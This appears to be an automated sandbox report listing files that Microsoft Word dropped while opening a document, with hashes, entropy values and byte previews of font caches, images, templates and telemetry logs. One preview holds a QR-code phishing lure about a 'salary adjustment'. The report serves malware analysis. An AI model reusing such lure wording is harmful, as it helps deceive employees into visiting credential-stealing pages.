                                                                                                                            Preview:p...... .............9..(...............................................B:.VZ.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):521377
                                                                                                                            Entropy (8bit):4.9084889265453135
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                            MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                            SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                            SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                            SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):773040
                                                                                                                            Entropy (8bit):6.55939673749297
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                            MD5:4296A064B917926682E7EED650D4A745
                                                                                                                            SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                            SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                            SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x40, components 3
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):908
                                                                                                                            Entropy (8bit):7.231998130599045
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:3c1spaupdDQ52NPZf6aEcZfc1N1hn84yrc5CXybmym:3iW1XLnmN1O4hCX5ym
                                                                                                                            MD5:709471BAF7860C56FB0949A9B9E06907
                                                                                                                            SHA1:176200FB15FF4EA0FD1D1C8594D1B9CA9C421687
                                                                                                                            SHA-256:D7A46EF5C531C1B1DA0B7AB96E485615D4AE046BC083EEC899E9211CD0825FBE
                                                                                                                            SHA-512:31E31CC379A68D0A741A6195A1350B1FD0B4D2D110EE3278C22DB7A6125E1DBFAEC685A57005FE27D16545662B556C775DC78B78B3DA4373D6F8AADE8C61C908
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......(.d.."........................................2..........................!1..."7Qr...Aq..#5a.................................!......................2.!.a................?..(.............#WqR>.~2.}4..i.v..SX..YtV...M<Nx..!....yc.Z...8.b..d...1.&.....9...B.s.K..-.........#...QU.........R.oU....o..8....J...in......e.gDg3.i..$..2....n...7...e..2....{...|.....C7ln.n..y.O.1.....\p..?..].H.I..}.....`.Nn.y(.s..!....g .....:?....I..T.....f........m....r1......g4..!.`.^.I)G._G......+.-e..z....St......L2.........?.5U._..+b..'MOec.K#...s08.x?...{...8y...2..#....x....S.........Z.....w..A]m..&.t.8...;y}r~.-].2..z.......\;..`4./.......J.\H%.#...#..\I?.#..i..*h.;>."".."".*G.O.[...;..jk.!."*I..w....Q..DXmPDD...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:PNG image data, 300 x 300, 8-bit/color RGB, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):79790
                                                                                                                            Entropy (8bit):7.990348100377639
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:1536:XjBGV4ITah2XPQszntigpa5I76+DAfcPVV1VETy/6TLOL6SnBVYanefe/DA/hA:XtGV3PXZQe76+TPV/a46TS6SnBaaneyd
                                                                                                                            MD5:DF9026A0C94E7E70EE5965ACA10EA1F7
                                                                                                                            SHA1:2693AC5D8C354CB621BEA77C25AFE0A9B6D087BC
                                                                                                                            SHA-256:AE25CAC5D9251394A7B4B8B9E4E7494C8C612C200C93A85578CAC65CDAC40811
                                                                                                                            SHA-512:4F4BA4409FB86618D9DBC4C25B7EAC7517322D5A55220BA1DBB3EDD5BC41325C4680CA231C5A10C561EA9A2BF1DF8710D541AE9B8EAC7D658B912C6085879520
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR...,...,........"....IDATx..g..U...+........J. ..%.....#.*"..xU.....F...#...E..EA... .M.n:..U.....:UuN..}.}.....N..k..V^..R.........&..8..8.}..........,o..P.u].]...=_...4..u.'..$4|...7MS4....m.Q4"....9..K@B....5;...i"|g.w]...Hj.w...........q.].._.e..]...}.o...7z.h....'..4..g.....B...k.1RJ.q..SZZ*..............|.....L.0.s......m.e....$.^...:u*>...W..>,......\H~..7....iQQQ.f.JHH.x#."//..g..H.'.h..\....?...m..S.....!v....[o...|.......+.q..7w..M.q....^x..'O..M.?4;....g.}.j|.1.z..'..._.x.wB1@.0f....,....>..c!DBB.Y....4Ms..?.......9r....R...I)'N....u....Jm.....p........l.....=........x<.6m.m.555`.........w.....6g.?J...:..].v../....>K_.>}...G...:..o..@48....V^.8........mn...,_....<x.s......e.aP_}..=.....eq..N.5~.}.y._.`.....eYR....?.....7|2k.,<...*//.R.]W..&N.H......h..i...?.a.QQQ.e%%%...G..i...222rss.....`.M.LLL....B$$$.....'III...!.....G..j.0..%....zTT.m.iii.fZZ...../.qqq.ij.........,x!!!..`.z_...j.......;. I{5....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):91797
                                                                                                                            Entropy (8bit):7.966196932849295
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:LDREjBGV4ITah2XPQszntigpa5I76+DAfcPVV1VETy/6TLOL6SnBVYanefe/DA/R:L9EtGV3PXZQe76+TPV/a46TS6SnBaanK
                                                                                                                            MD5:ACD96A1EDF27B5EDD3C15B63AABC1FF3
                                                                                                                            SHA1:85D0699811ADF52D35C2FC9FCB71CDE0F9846ACA
                                                                                                                            SHA-256:74B5266C756481F9E5C0BFA653ED5DFFB041E900C7C3335626C1E231903EA71D
                                                                                                                            SHA-512:C7A71181AAC2FC89C0B1B7B79E99482DFEC38DED8884F60939C786191EAA63A563FFE5542FD5569F5118433D3354C2CA294FC7E49EE490B64E1B35B36A34F3B1
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........!..G.Xy...........[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.n.0..W.?D.V.........[...0.$..&.l..!...."......J.d....s..z$..M!t....KzO.....4.r..OF...dm.'..>'.......@1....+.q..<..Z.X........:... ....l.C...O..I.7..VN...b..b.n.........0k..,`.t...Y...."c....op._....1....7\...$c..+S8,].W......4->MY..;|.f...=nV.lWQL.....l.;c=E.g.z...)z....]vG..qp.x....G.z...M.?$.b.Q..<......>v.....BXK.....)..1.....S.4..K.._,.=..............PK..........!...;....N......._rels/.rels ...(........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):16384
                                                                                                                            Entropy (8bit):0.3613836054883338
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                            MD5:679672A5004E0AF50529F33DB5469699
                                                                                                                            SHA1:427A4EC3281C9C4FAEB47A22FFBE7CA3E928AFB0
                                                                                                                            SHA-256:205D000AA762F3A96AC3AD4B25D791B5F7FC8EFB9056B78F299F671A02B9FD21
                                                                                                                            SHA-512:F8615C5E5CF768A94E06961C7C8BEF99BEB43E004A882A4E384F5DD56E047CA59B963A59971F78DCF4C35D1BB92D3A9BC7055BFA3A0D597635DE1A9CE06A3476
                                                                                                                            Malicious:false
                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2564
                                                                                                                            Entropy (8bit):2.9332069189261363
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:CYWTp6xq/sLyz0QSvardhxwqSIz6Svf4O6kSnuSvgpUhka+kcw+soiXos1DU5ZtD:Cnp68PQS5jIkSn3PrD+bs1kTD
                                                                                                                            MD5:6FFB7D72DD7C136E25C069984720D730
                                                                                                                            SHA1:0170E2E24900CBB5A22F525A9704EAA01242D40D
                                                                                                                            SHA-256:D59EB2F85D84F36F1D16A17BE387C823C77AAC7413572EB6DF894534617EBA5E
                                                                                                                            SHA-512:9F99DDFCB8DE94623C1627EF3FA5D4D44734464007A475E11E90D6537E5DFDCF32496A0FBF66F721D51FD431D3F661A43DE75D02E69E472968D89B6938A1C4A4
                                                                                                                            Malicious:false
                                                                                                                            Preview:../...M.r.e.t.t.i.n.g.e.r. .B.e.n.e.f.i.t.s./.S.a.l.a.r.y. .A.d.j.u.s.t.m.e.n.t...A.c.c.e.s.s. .y.o.u.r. .s.e.c.u.r.e. .d.o.c.u.m.e.n.t. .b.y. .s.c.a.n.n.i.n.g. .t.h.e. .Q.R. .c.o.d.e. .b.e.l.o.w. .w.i.t.h. .y.o.u.r. .s.m.a.r.t.p.h.o.n.e... .T.h.i.s. .w.i.l.l. .t.a.k.e. .y.o.u. .d.i.r.e.c.t.l.y. .t.o. .t.h.e. .d.o.c.u.m.e.n.t. .r.e.v.i.e.w. .p.a.g.e...../...D.i.s.c.l.a.i.m.e.r.:...............................................................................................................................................R...d..........................................Q.......................................................................................................0...$.............$d....%d....&d....'d....N..........O..........P..........Q..........]...^...a$......$.........$d....&d....N..........P..........a$..6...$..$..$...,...,..d........$d....%d....&d....'d....N..........O..........P..........Q..........].,.^.,.a$..+....,...,.$d....%d....&d....'d....N..........O..........P.......
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1536
                                                                                                                            Entropy (8bit):1.2969208054821262
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ml+lGl+l+l+l1PPPXll1l7lhlJvl5hzldlxpxl/b1l/pl/Ppl/NllXljl/tl/rlh:mEMEEEul39lCgK1qV+BN+ux0I20v0bW
                                                                                                                            MD5:79190D75C19F33ACE970092D830009F7
                                                                                                                            SHA1:649B51E0468642360A71AA09012E4464014FEBE5
                                                                                                                            SHA-256:8414886DDE6159ECFF19CA1B51E57970AFD2231730F91B37647BE20240AA214A
                                                                                                                            SHA-512:2A9B86C65A64F916418B3D13D1050C330EF2A91A276BB6CE100B141BA95D0CA5D8837A0DA2CE5300D3EB63ACDF242AE0B41116DE12F7CE72FBCD2F79E999B639
                                                                                                                            Malicious:false
                                                                                                                            Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20971520
                                                                                                                            Entropy (8bit):0.01757548534076591
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:GCTo9HY9fB2FCBzS0PvKFj7W/+0BN6bSEAIU3tzRc+:x
                                                                                                                            MD5:ABC7B7132DECD5B55E4C1ED8D0DFA759
                                                                                                                            SHA1:2DB2907581B9B7FAC0DE1DED375A5AEF5A893F0A
                                                                                                                            SHA-256:7F47A0E7276C40C3C2F5274D9E9DF1D5ABFD554A130E76D8E6624A7F4A432575
                                                                                                                            SHA-512:FFF012703669BFDA8A61A59DB1B7BD4199A7CD9110379F1A965FA8AA60300D873CB4B9FCBA758B83C93A49A6AD4AF5F9C13F97659B6F7C23E8BC10910CA09E86
                                                                                                                            Malicious:false
                                                                                                                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/18/2024 16:55:20.129.WINWORD (0x1774).0x1424.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-11-18T16:55:20.129Z","Contract":"Office.System.Activity","Activity.CV":"u0nDdEgtHUKekcCvbSFTug.7.1","Activity.Duration":174,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/18/2024 16:55:20.129.WINWORD (0x1774).0x1424.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-11-18T16:55:20.129Z","Contract":"Office.System.Activity","Activity.CV":"u0nDdEgtHUKekcCvbSFTug.7","Activity.Duration":585,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDi
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20971520
                                                                                                                            Entropy (8bit):0.0
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3::
                                                                                                                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                            Malicious:false
                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):254
                                                                                                                            Entropy (8bit):3.4721586910685547
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                            MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                            SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                            SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                            SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4243
                                                                                                                            Entropy (8bit):7.824383764848892
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                            MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                            SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                            SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                            SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):252
                                                                                                                            Entropy (8bit):3.4680595384446202
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                            MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                            SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                            SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                            SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5783
                                                                                                                            Entropy (8bit):7.88616857639663
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                            MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                            SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                            SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                            SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):254
                                                                                                                            Entropy (8bit):3.4845992218379616
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                            MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                            SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                            SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                            SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6024
                                                                                                                            Entropy (8bit):7.886254023824049
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                            MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                            SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                            SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                            SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):280
                                                                                                                            Entropy (8bit):3.484503080761839
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                            MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                            SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                            SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                            SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                            Malicious:false
